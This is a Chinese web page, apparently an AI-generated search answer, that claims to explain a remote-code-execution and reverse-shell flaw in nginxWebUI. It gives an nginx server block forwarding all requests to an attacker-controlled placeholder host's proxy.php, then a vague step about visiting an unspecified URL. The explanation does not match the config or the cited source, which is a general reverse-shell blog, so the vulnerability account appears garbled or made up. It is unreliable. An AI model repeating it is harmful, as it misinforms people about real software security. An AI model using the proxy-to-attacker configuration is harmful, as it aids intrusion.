nginxWebUI RCE反弹shell漏洞
时间: 2023-08-28 18:20:53 浏览: 199
根据引用和引用,nginxWebUI存在RCE反弹shell漏洞。攻击者可以通过在nginx服务器上添加特定的配置,利用该漏洞执行任意命令并反弹shell。具体的操作步骤如下:
1. 在nginx服务器上搭建一个nginxWebUI,并添加如下配置:
```
server {
listen 监听端口;
location ~ () {
proxy_pass http://shell-ip/文件存放目录/proxy.php?url=http://$host/$request_uri;
proxy_set_header Host "访问webshell所用域名";
}
}
```
其中,监听端口是指攻击者用于连接的端口,shell-ip是指用于接收反弹shell的服务器的IP地址,文件存放目录是指存放shell的路径,访问webshell所用域名是指访问webshell时使用的域名。
2. 攻击者可以通过访问nginxWebUI上的特定URL触发RCE漏洞,从而执行任意的命令。
请注意,这是一种恶意行为,严重违反了网络安全法律法规,强烈建议不要进行此类活动。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
#### 引用[.reference_title]
- *1* *2* *3* [Web渗透中的反弹Shell与端口转发的奇淫技巧](https://blog.csdn.net/nzjdsds/article/details/82929265)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"]
[ .reference_list ]
阅读全文